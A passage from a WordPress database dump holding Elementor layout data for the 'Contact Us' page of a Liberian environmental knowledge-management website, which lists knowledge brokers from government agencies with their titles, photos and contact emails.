\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23066,3332,'_elementor_edit_mode','builder'),(23067,3332,'_elementor_template_type','wp-page'),(23068,3332,'_elementor_version','3.0.16'),(23069,3332,'_wp_page_template','default'),(23070,3332,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"tex